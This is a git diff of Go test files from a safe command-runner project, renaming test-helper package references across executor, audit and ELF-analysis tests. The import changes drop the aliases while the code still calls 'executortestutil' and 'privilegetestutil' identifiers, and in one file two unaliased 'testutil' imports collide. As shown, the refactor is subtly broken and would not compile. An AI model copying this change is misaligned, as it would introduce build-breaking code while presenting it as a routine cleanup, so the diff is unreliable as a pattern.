 		v, err := New(&SHA256{}, hashDir, ValidatorConfig{
 			DebugInfo: true,
@@ -866,7 +866,7 @@ func TestRecord_SyscallOccurrence_SourcePathOmittedWithoutDebugInfo(t *testing.T
 	require.NoError(t, os.MkdirAll(hashDir, 0o700))
 
 	targetFile := filepath.Join(tempDir, "target.bin")
-	elfanalyzertesting.CreateDynamicELFFile(t, targetFile)
+	elfanalyzertestutil.CreateDynamicELFFile(t, targetFile)
 
 	v, err := New(&SHA256{}, hashDir, ValidatorConfig{SyscallAnalyzer: &stubSyscallAnalyzerWithDebugInfo{}})
 	require.NoError(t, err)
@@ -1245,7 +1245,7 @@ func TestRecord_DebugInfo_ELF(t *testing.T) {
 	require.NoError(t, os.MkdirAll(hashDir, 0o700))
 
 	targetFile := filepath.Join(tempDir, "target.bin")
-	elfanalyzertesting.CreateDynamicELFFile(t, targetFile)
+	elfanalyzertestutil.CreateDynamicELFFile(t, targetFile)
 
 	v, err := New(&SHA256{}, hashDir, ValidatorConfig{SyscallAnalyzer: &stubSyscallAnalyzerWithDebugInfo{}})
 	require.NoError(t, err)
@@ -1322,7 +1322,7 @@ func TestRecord_LibcCache_Error_CausesRecordFailure(t *testing.T) {
 	// libc cache path without depending on any system binary.
 	tempDir := safeTempDir(t)
 	elfPath := filepath.Join(tempDir, "test.elf")
-	elfanalyzertesting.CreateDynamicELFFile(t, elfPath)
+	elfanalyzertestutil.CreateDynamicELFFile(t, elfPath)
 
 	stub := &stubLibcCache{err: errors.New("libc file not accessible")}
 	v, err := New(&SHA256{}, tempDir, ValidatorConfig{LibcCache: stub})
@@ -1364,7 +1364,7 @@ func TestRecord_Force_ELFToNonELF_ClearsSyscallAnalysis(t *testing.T) {
 
 	// Create an in-memory ELF at the target path.
 	targetFile := filepath.Join(tempDir, "target.bin")
-	elfanalyzertesting.CreateDynamicELFFile(t, targetFile)
+	elfanalyzertestutil.CreateDynamicELFFile(t, targetFile)
 
 	v, err := New(&SHA256{}, hashDir, ValidatorConfig{SyscallAnalyzer: &stubSyscallAnalyzerReturnsOne{}})
 	require.NoError(t, err)
@@ -1414,7 +1414,7 @@ func TestRecord_Force_SyscallsToNone_ClearsSyscallAnalysis(t *testing.T) {
 
 	// Create an in-memory ELF at the target path.
 	targetFile := filepath.Join(tempDir, "target.bin")
-	elfanalyzertesting.CreateDynamicELFFile(t, targetFile)
+	elfanalyzertestutil.CreateDynamicELFFile(t, targetFile)
 
 	v, err := New(&SHA256{}, hashDir, ValidatorConfig{SyscallAnalyzer: &stubSyscallAnalyzerReturnsOne{}})
 	require.NoError(t, err)

--- a/internal/runner/base/audit/logger_test.go
+++ b/internal/runner/base/audit/logger_test.go
@@ -9,7 +9,7 @@ import (
 	"time"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/audit"
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -38,10 +38,10 @@ func TestLogger_LogUserGroupExecution(t *testing.T) {
 	}{
 		{
 			name: "successful user/group command",
-			cmd: executortesting.CreateRuntimeCommand("/bin/echo", []string{"test"},
-				executortesting.WithName("test_user_group_cmd"),
-				executortesting.WithRunAsUser("testuser"),
-				executortesting.WithRunAsGroup("testgroup")),
+			cmd: executortestutil.CreateRuntimeCommand("/bin/echo", []string{"test"},
+				executortestutil.WithName("test_user_group_cmd"),
+				executortestutil.WithRunAsUser("testuser"),
+				executortestutil.WithRunAsGroup("testgroup")),
 			result: &audit.ExecutionResult{
 				Stdout:   "test output",
 				Stderr:   "",
@@ -55,10 +55,10 @@ func TestLogger_LogUserGroupExecution(t *testing.T) {
 		},
 		{
 			name: "failed user/group command",
-			cmd: executortesting.CreateRuntimeCommand("/bin/false", []string{},
-				executortesting.WithName("test_failed_user_group_cmd"),
-				executortesting.WithRunAsUser("testuser"),
-				executortesting.WithRunAsGroup("testgroup")),
+			cmd: executortestutil.CreateRuntimeCommand("/bin/false", []string{},
+				executortestutil.WithName("test_failed_user_group_cmd"),
+				executortestutil.WithRunAsUser("testuser"),
+				executortestutil.WithRunAsGroup("testgroup")),
 			result: &audit.ExecutionResult{
 				Stdout:   "",
 				Stderr:   "command failed",
@@ -72,9 +72,9 @@ func TestLogger_LogUserGroupExecution(t *testing.T) {
 		},
 		{
 			name: "user only command",
-			cmd: executortesting.CreateRuntimeCommand("/bin/id", []string{},
-				executortesting.WithName("test_user_only_cmd"),
-				executortesting.WithRunAsUser("testuser")),
+			cmd: executortestutil.CreateRuntimeCommand("/bin/id", []string{},
+				executortestutil.WithName("test_user_only_cmd"),
+				executortestutil.WithRunAsUser("testuser")),
 			result: &audit.ExecutionResult{
 				Stdout:   "uid=1001(testuser)",
 				Stderr:   "",

--- a/internal/runner/base/executor/environment_bench_test.go
+++ b/internal/runner/base/executor/environment_bench_test.go
@@ -4,7 +4,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 )
 
@@ -52,9 +52,9 @@ func BenchmarkBuildProcessEnvironment(b *testing.B) {
 		ExpandedEnv: groupEnv,
 	}
 
-	cmd := executortesting.CreateRuntimeCommand("bench-command", []string{},
-		executortesting.WithName("bench-command"),
-		executortesting.WithExpandedEnv(cmdEnv))
+	cmd := executortestutil.CreateRuntimeCommand("bench-command", []string{},
+		executortestutil.WithName("bench-command"),
+		executortestutil.WithExpandedEnv(cmdEnv))
 
 	b.ResetTimer()
 	for range b.N {
@@ -85,9 +85,9 @@ func BenchmarkBuildProcessEnvironment_Small(b *testing.B) {
 		},
 	}
 
-	cmd := executortesting.CreateRuntimeCommand("echo", []string{},
-		executortesting.WithName("test-echo-command"),
-		executortesting.WithExpandedEnv(map[string]string{
+	cmd := executortestutil.CreateRuntimeCommand("echo", []string{},
+		executortestutil.WithName("test-echo-command"),
+		executortestutil.WithExpandedEnv(map[string]string{
 			"CMD_VAR": "value",
 		}))
 

--- a/internal/runner/base/executor/environment_test.go
+++ b/internal/runner/base/executor/environment_test.go
@@ -4,7 +4,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 )
@@ -22,8 +22,8 @@ func createTestRuntimeGlobal(envAllowlist []string, expandedEnv map[string]strin
 }
 
 func createTestRuntimeCommand(expandedArgs []string, expandedEnv map[string]string) *runnertypes.RuntimeCommand {
-	return executortesting.CreateRuntimeCommand("echo", expandedArgs,
-		executortesting.WithExpandedEnv(expandedEnv),
+	return executortestutil.CreateRuntimeCommand("echo", expandedArgs,
+		executortestutil.WithExpandedEnv(expandedEnv),
 	)
 }
 

--- a/internal/runner/base/executor/executor_logging_test.go
+++ b/internal/runner/base/executor/executor_logging_test.go
@@ -10,7 +10,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -24,7 +24,7 @@ func createTestCommand(cmd string, args []string) *runnertypes.RuntimeCommand {
 		Args: args,
 	}
 
-	rtCmd, err := runnertypes.NewRuntimeCommand(spec, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit(), "test_group")
+	rtCmd, err := runnertypes.NewRuntimeCommand(spec, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit(), "test_group")
 	if err != nil {
 		panic(err)
 	}

--- a/internal/runner/base/executor/executor_test.go
+++ b/internal/runner/base/executor/executor_test.go
@@ -9,8 +9,8 @@ import (
 
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/audit"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
-	privilegetesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/privilege/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/privilege/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -20,13 +20,13 @@ import (
 // This is required because executor now expects absolute, symlink-resolved paths
 // (resolved by PathResolver.ResolvePath in production).
 var (
-	echoCmd     = executortesting.ResolveCommand("echo")
-	pwdCmd      = executortesting.ResolveCommand("pwd")
-	shCmd       = executortesting.ResolveCommand("sh")
-	sleepCmd    = executortesting.ResolveCommand("sleep")
-	printenvCmd = executortesting.ResolveCommand("printenv")
-	lsCmd       = executortesting.ResolveCommand("ls")
-	whoamiCmd   = executortesting.ResolveCommand("whoami")
+	echoCmd     = executortestutil.ResolveCommand("echo")
+	pwdCmd      = executortestutil.ResolveCommand("pwd")
+	shCmd       = executortestutil.ResolveCommand("sh")
+	sleepCmd    = executortestutil.ResolveCommand("sleep")
+	printenvCmd = executortestutil.ResolveCommand("printenv")
+	lsCmd       = executortestutil.ResolveCommand("ls")
+	whoamiCmd   = executortestutil.ResolveCommand("whoami")
 )
 
 func TestExecute_Success(t *testing.T) {
@@ -41,7 +41,7 @@ func TestExecute_Success(t *testing.T) {
 	}{
 		{
 			name:             "simple command",
-			cmd:              executortesting.CreateRuntimeCommand(echoCmd, []string{"hello"}, executortesting.WithWorkDir("")),
+			cmd:              executortestutil.CreateRuntimeCommand(echoCmd, []string{"hello"}, executortestutil.WithWorkDir("")),
 			env:              map[string]string{"TEST": "value"},
 			wantErr:          false,
 			expectedStdout:   "hello\n",
@@ -50,7 +50,7 @@ func TestExecute_Success(t *testing.T) {
 		},
 		{
 			name:             "command with working directory",
-			cmd:              executortesting.CreateRuntimeCommand(pwdCmd, []string{}, executortesting.WithWorkDir(".")),
+			cmd:              executortestutil.CreateRuntimeCommand(pwdCmd, []string{}, executortestutil.WithWorkDir(".")),
 			env:              nil,
 			wantErr:          false,
 			expectedStdout:   "", // pwd output varies, so we'll just check it's not empty
@@ -59,7 +59,7 @@ func TestExecute_Success(t *testing.T) {
 		},
 		{
 			name:             "command with multiple arguments",
-			cmd:              executortesting.CreateRuntimeCommand(echoCmd, []string{"-n", "test"}, executortesting.WithWorkDir("")),
+			cmd:              executortestutil.CreateRuntimeCommand(echoCmd, []string{"-n", "test"}, executortestutil.WithWorkDir("")),
 			env:              map[string]string{},
 			wantErr:          false,
 			expectedStdout:   "test",
@@ -70,7 +70,7 @@ func TestExecute_Success(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			fileSystem := &executortesting.MockFileSystem{
+			fileSystem := &executortestutil.MockFileSystem{
 				ExistingPaths: make(map[string]bool),
 			}
 
@@ -79,7 +79,7 @@ func TestExecute_Success(t *testing.T) {
 				fileSystem.ExistingPaths[tt.cmd.EffectiveWorkDir] = true
 			}
 
-			outputWriter := &executortesting.MockOutputWriter{}
+			outputWriter := &executortestutil.MockOutputWriter{}
 
 			e := executor.NewDefaultExecutor(
 				executor.WithFileSystem(fileSystem),
@@ -117,27 +117,27 @@ func TestExecute_Failure(t *testing.T) {
 	}{
 		{
 			name:    "non-existent command",
-			cmd:     executortesting.CreateRuntimeCommand("/nonexistent/command12345", []string{}, executortesting.WithWorkDir("")),
+			cmd:     executortestutil.CreateRuntimeCommand("/nonexistent/command12345", []string{}, executortestutil.WithWorkDir("")),
 			env:     map[string]string{},
 			wantErr: true,
 			errMsg:  "no such file or directory",
 		},
 		{
 			name:    "command with non-zero exit status",
-			cmd:     executortesting.CreateRuntimeCommand(shCmd, []string{"-c", "exit 1"}, executortesting.WithWorkDir("")),
+			cmd:     executortestutil.CreateRuntimeCommand(shCmd, []string{"-c", "exit 1"}, executortestutil.WithWorkDir("")),
 			env:     map[string]string{},
 			wantErr: true,
 			errMsg:  "command execution failed",
 		},
 		{
 			name:    "command writing to stderr",
-			cmd:     executortesting.CreateRuntimeCommand(shCmd, []string{"-c", "echo 'error message' >&2; exit 0"}, executortesting.WithWorkDir("")),
+			cmd:     executortestutil.CreateRuntimeCommand(shCmd, []string{"-c", "echo 'error message' >&2; exit 0"}, executortestutil.WithWorkDir("")),
 			env:     map[string]string{},
 			wantErr: false, // This should succeed but capture stderr
 		},
 		{
 			name:    "command that takes time (for timeout test)",
-			cmd:     executortesting.CreateRuntimeCommand(sleepCmd, []string{"2"}, executortesting.WithWorkDir("")),
+			cmd:     executortestutil.CreateRuntimeCommand(sleepCmd, []string{"2"}, executortestutil.WithWorkDir("")),
 			env:     map[string]string{},
 			timeout: 100 * time.Millisecond,
 			wantErr: true,
@@ -147,7 +147,7 @@ func TestExecute_Failure(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			fileSystem := &executortesting.MockFileSystem{
+			fileSystem := &executortestutil.MockFileSystem{
 				ExistingPaths: make(map[string]bool),
 			}
 
@@ -156,7 +156,7 @@ func TestExecute_Failure(t *testing.T) {
 				fileSystem.ExistingPaths[tt.cmd.EffectiveWorkDir] = true
 			}
 
-			outputWriter := &executortesting.MockOutputWriter{}
+			outputWriter := &executortestutil.MockOutputWriter{}
 
 			e := executor.NewDefaultExecutor(
 				executor.WithFileSystem(fileSystem),
@@ -190,7 +190,7 @@ func TestExecute_Failure(t *testing.T) {
 }
 
 func TestExecute_ContextCancellation(t *testing.T) {
-	fileSystem := &executortesting.MockFileSystem{
+	fileSystem := &executortestutil.MockFileSystem{
 		ExistingPaths: make(map[string]bool),
 	}
 
@@ -202,12 +202,12 @@ func TestExecute_ContextCancellation(t *testing.T) {
 	ctx, cancel := context.WithCancel(context.Background())
 
 	// Start a long-running command
-	cmd := executortesting.CreateRuntimeCommand(sleepCmd, []string{"10"}, executortesting.WithWorkDir(""))
+	cmd := executortestutil.CreateRuntimeCommand(sleepCmd, []string{"10"}, executortestutil.WithWorkDir(""))
 
 	// Cancel the context immediately
 	cancel()
 
-	result, err := e.Execute(ctx, cmd, map[string]string{}, &executortesting.MockOutputWriter{})
+	result, err := e.Execute(ctx, cmd, map[string]string{}, &executortestutil.MockOutputWriter{})
 
 	// Should get an error due to context cancellation
 	assert.Error(t, err, "Expected error due to context cancellation")
@@ -218,7 +218,7 @@ func TestExecute_ContextCancellation(t *testing.T) {
 func TestExecute_EnvironmentVariables(t *testing.T) {
 	// Test that only filtered environment variables are passed to executed commands
 	// and os.Environ() variables are not leaked through
-	fileSystem := &executortesting.MockFileSystem{
+	fileSystem := &executortestutil.MockFileSystem{
 		ExistingPaths: make(map[string]bool),
 	}
 
@@ -229,7 +229,7 @@ func TestExecute_EnvironmentVariables(t *testing.T) {
 	// Set a test environment variable in the runner process
 	t.Setenv("LEAKED_VAR", "should_not_appear")
 
-	cmd := executortesting.CreateRuntimeCommand(printenvCmd, []string{}, executortesting.WithWorkDir(""))
+	cmd := executortestutil.CreateRuntimeCommand(printenvCmd, []string{}, executortestutil.WithWorkDir(""))
 
 	// Only provide filtered variables through envVars parameter
 	envVars := map[string]string{
@@ -238,7 +238,7 @@ func TestExecute_EnvironmentVariables(t *testing.T) {
 	}
 
 	ctx := context.Background()
-	result, err := e.Execute(ctx, cmd, envVars, &executortesting.MockOutputWriter{})
+	result, err := e.Execute(ctx, cmd, envVars, &executortestutil.MockOutputWriter{})
 
 	require.NoError(t, err, "Execute should not return an error")
 	require.NotNil(t, result, "Result should not be nil")
@@ -257,24 +257,24 @@ func TestValidate(t *testing.T) {
 	}{
 		{
 			name:    "empty command",
-			cmd:     executortesting.CreateRuntimeCommand("", []string{}, executortesting.WithWorkDir("")),
+			cmd:     executortestutil.CreateRuntimeCommand("", []string{}, executortestutil.WithWorkDir("")),
 			wantErr: true,
 		},
 		{
 			name:    "valid command",
-			cmd:     executortesting.CreateRuntimeCommand(echoCmd, []string{"hello"}, executortesting.WithWorkDir("")),
+			cmd:     executortestutil.CreateRuntimeCommand(echoCmd, []string{"hello"}, executortestutil.WithWorkDir("")),
 			wantErr: false,
 		},
 		{
 			name:    "invalid directory",
-			cmd:     executortesting.CreateRuntimeCommand(lsCmd, []string{}, executortesting.WithWorkDir("/nonexistent/directory")),
+			cmd:     executortestutil.CreateRuntimeCommand(lsCmd, []string{}, executortestutil.WithWorkDir("/nonexistent/directory")),
 			wantErr: true,
 		},
 	}
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			fileSystem := &executortesting.MockFileSystem{
+			fileSystem := &executortestutil.MockFileSystem{
 				ExistingPaths: make(map[string]bool),
 			}
 
@@ -303,13 +303,13 @@ func TestValidate(t *testing.T) {
 
 func TestDefaultExecutor_ExecuteUserGroupPrivileges(t *testing.T) {
 	t.Run("user_group_execution_success", func(t *testing.T) {
-		mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 		exec := executor.NewDefaultExecutor(
 			executor.WithPrivilegeManager(mockPriv),
-			executor.WithFileSystem(&executortesting.MockFileSystem{}),
+			executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 		)
 
-		cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("testuser"), executortesting.WithRunAsGroup("testgroup"))
+		cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("testuser"), executortestutil.WithRunAsGroup("testgroup"))
 
 		result, err := exec.Execute(context.Background(), cmd, map[string]string{}, nil)
 
@@ -324,10 +324,10 @@ func TestDefaultExecutor_ExecuteUserGroupPrivileges(t *testing.T) {
 	t.Run("user_group_no_privilege_manager", func(t *testing.T) {
 		// Create executor without privilege manager
 		exec := executor.NewDefaultExecutor(
-			executor.WithFileSystem(&executortesting.MockFileSystem{}),
+			executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 		)
 
-		cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("testuser"), executortesting.WithRunAsGroup("testgroup"))
+		cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("testuser"), executortestutil.WithRunAsGroup("testgroup"))
 
 		result, err := exec.Execute(context.Background(), cmd, map[string]string{}, nil)
 
@@ -337,13 +337,13 @@ func TestDefaultExecutor_ExecuteUserGroupPrivileges(t *testing.T) {
 	})
 
 	t.Run("user_group_not_supported", func(t *testing.T) {
-		mockPriv := privilegetesting.NewMockPrivilegeManager(false) // Not supported
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(false) // Not supported
 		exec := executor.NewDefaultExecutor(
 			executor.WithPrivilegeManager(mockPriv),
-			executor.WithFileSystem(&executortesting.MockFileSystem{}),
+			executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 		)
 
-		cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("testuser"), executortesting.WithRunAsGroup("testgroup"))
+		cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("testuser"), executortestutil.WithRunAsGroup("testgroup"))
 
 		result, err := exec.Execute(context.Background(), cmd, map[string]string{}, nil)
 
@@ -353,13 +353,13 @@ func TestDefaultExecutor_ExecuteUserGroupPrivileges(t *testing.T) {
 	})
 
 	t.Run("user_group_privilege_execution_fails", func(t *testing.T) {
-		mockPriv := privilegetesting.NewFailingMockPrivilegeManager(true)
+		mockPriv := privilegetestutil.NewFailingMockPrivilegeManager(true)
 		exec := executor.NewDefaultExecutor(
 			executor.WithPrivilegeManager(mockPriv),
-			executor.WithFileSystem(&executortesting.MockFileSystem{}),
+			executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 		)
 
-		cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("invaliduser"), executortesting.WithRunAsGroup("invalidgroup"))
+		cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("invaliduser"), executortestutil.WithRunAsGroup("invalidgroup"))
 
 		result, err := exec.Execute(context.Background(), cmd, map[string]string{}, nil)
 
@@ -369,13 +369,13 @@ func TestDefaultExecutor_ExecuteUserGroupPrivileges(t *testing.T) {
 	})
 
 	t.Run("only_user_specified", func(t *testing.T) {
-		mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 		exec := executor.NewDefaultExecutor(
 			executor.WithPrivilegeManager(mockPriv),
-			executor.WithFileSystem(&executortesting.MockFileSystem{}),
+			executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 		)
 
-		cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("testuser"))
+		cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("testuser"))
 
 		result, err := exec.Execute(context.Background(), cmd, map[string]string{}, nil)
 
@@ -388,13 +388,13 @@ func TestDefaultExecutor_ExecuteUserGroupPrivileges(t *testing.T) {
 	})
 
 	t.Run("only_group_specified", func(t *testing.T) {
-		mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 		exec := executor.NewDefaultExecutor(
 			executor.WithPrivilegeManager(mockPriv),
-			executor.WithFileSystem(&executortesting.MockFileSystem{}),
+			executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 		)
 
-		cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir(""), executortesting.WithRunAsGroup("testgroup"))
+		cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsGroup("testgroup"))
 
 		result, err := exec.Execute(context.Background(), cmd, map[string]string{}, nil)
 
@@ -410,13 +410,13 @@ func TestDefaultExecutor_ExecuteUserGroupPrivileges(t *testing.T) {
 func TestDefaultExecutor_Execute_Integration(t *testing.T) {
 	t.Run("privileged_with_user_group_both_specified", func(t *testing.T) {
 		// Test case where user/group are specified
-		mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 		exec := executor.NewDefaultExecutor(
 			executor.WithPrivilegeManager(mockPriv),
-			executor.WithFileSystem(&executortesting.MockFileSystem{}),
+			executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 		)
 
-		cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("testuser"), executortesting.WithRunAsGroup("testgroup"))
+		cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("testuser"), executortestutil.WithRunAsGroup("testgroup"))
 
 		result, err := exec.Execute(context.Background(), cmd, map[string]string{}, nil)
 
@@ -430,13 +430,13 @@ func TestDefaultExecutor_Execute_Integration(t *testing.T) {
 
 	t.Run("normal_execution_no_privileges", func(t *testing.T) {
 		// Test case where user/group are not specified
-		mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 		exec := executor.NewDefaultExecutor(
 			executor.WithPrivilegeManager(mockPriv),
-			executor.WithFileSystem(&executortesting.MockFileSystem{}),
+			executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 		)
 
-		cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir(""))
+		cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir(""))
 
 		result, err := exec.Execute(context.Background(), cmd, map[string]string{}, nil)
 
@@ -459,23 +459,23 @@ func TestUserGroupCommandValidation_PathRequirements(t *testing.T) {
 	}{
 		{
 			name:        "valid absolute path works for user/group command",
-			cmd:         executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("testuser"), executortesting.WithRunAsGroup("testgroup")),
+			cmd:         executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("testuser"), executortestutil.WithRunAsGroup("testgroup")),
 			expectError: false,
 		},
 		{
 			name:          "relative working directory fails for user/group command",
-			cmd:           executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir("tmp"), executortesting.WithRunAsUser("testuser"), executortesting.WithRunAsGroup("testgroup")),
+			cmd:           executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir("tmp"), executortestutil.WithRunAsUser("testuser"), executortestutil.WithRunAsGroup("testgroup")),
 			expectError:   true,
 			errorContains: "does not exist", // Basic validation fails first (directory existence check)
 		},
 		{
 			name:        "absolute working directory works for user/group command",
-			cmd:         executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir("/tmp"), executortesting.WithRunAsUser("testuser"), executortesting.WithRunAsGroup("testgroup")),
+			cmd:         executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir("/tmp"), executortestutil.WithRunAsUser("testuser"), executortestutil.WithRunAsGroup("testgroup")),
 			expectError: false,
 		},
 		{
 			name:          "path with relative components fails in standard validation",
-			cmd:           executortesting.CreateRuntimeCommand("/bin/../bin/echo", []string{"test"}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("testuser"), executortesting.WithRunAsGroup("testgroup")),
+			cmd:           executortestutil.CreateRuntimeCommand("/bin/../bin/echo", []string{"test"}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("testuser"), executortestutil.WithRunAsGroup("testgroup")),
 			expectError:   true,
 			errorContains: "command path contains relative path components", // Error message from standard validation
 		},
@@ -484,12 +484,12 @@ func TestUserGroupCommandValidation_PathRequirements(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Create a mock filesystem for directory validation
-			mockFS := &executortesting.MockFileSystem{
+			mockFS := &executortestutil.MockFileSystem{
 				ExistingPaths: map[string]bool{
 					"/tmp": true,
 				},
 			}
-			mockPrivMgr := privilegetesting.NewMockPrivilegeManager(true)
+			mockPrivMgr := privilegetestutil.NewMockPrivilegeManager(true)
 
 			exec := executor.NewDefaultExecutor(
 				executor.WithPrivilegeManager(mockPrivMgr),
@@ -516,7 +516,7 @@ func TestUserGroupCommandValidation_PathRequirements(t *testing.T) {
 // TestDefaultExecutor_ExecuteUserGroupPrivileges_AuditLogging tests audit logging for user/group command execution
 func TestDefaultExecutor_ExecuteUserGroupPrivileges_AuditLogging(t *testing.T) {
 	t.Run("audit_logging_successful_execution", func(t *testing.T) {
-		mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 
 		// Create a real audit logger with custom slog handler to capture logs
 		var logBuffer bytes.Buffer
@@ -525,11 +525,11 @@ func TestDefaultExecutor_ExecuteUserGroupPrivileges_AuditLogging(t *testing.T) {
 
 		exec := executor.NewDefaultExecutor(
 			executor.WithPrivilegeManager(mockPriv),
-			executor.WithFileSystem(&executortesting.MockFileSystem{}),
+			executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 			executor.WithAuditLogger(auditLogger),
 		)
 
-		cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithName("test_audit_user_group"), executortesting.WithWorkDir(""), executortesting.WithRunAsUser("testuser"), executortesting.WithRunAsGroup("testgroup"))
+		cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithName("test_audit_user_group"), executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("testuser"), executortestutil.WithRunAsGroup("testgroup"))
 
 		result, err := exec.Execute(context.Background(), cmd, map[string]string{}, nil)
 
@@ -546,15 +546,15 @@ func TestDefaultExecutor_ExecuteUserGroupPrivileges_AuditLogging(t *testing.T) {
 	})
 
 	t.Run("no_audit_logging_when_logger_nil", func(t *testing.T) {
-		mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 
 		exec := executor.NewDefaultExecutor(
 			executor.WithPrivilegeManager(mockPriv),
-			executor.WithFileSystem(&executortesting.MockFileSystem{}),
+			executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 			// No audit logger provided
 		)
 
-		cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithName("test_no_audit"), executortesting.WithWorkDir(""), executortesting.WithRunAsUser("testuser"), executortesting.WithRunAsGroup("testgroup"))
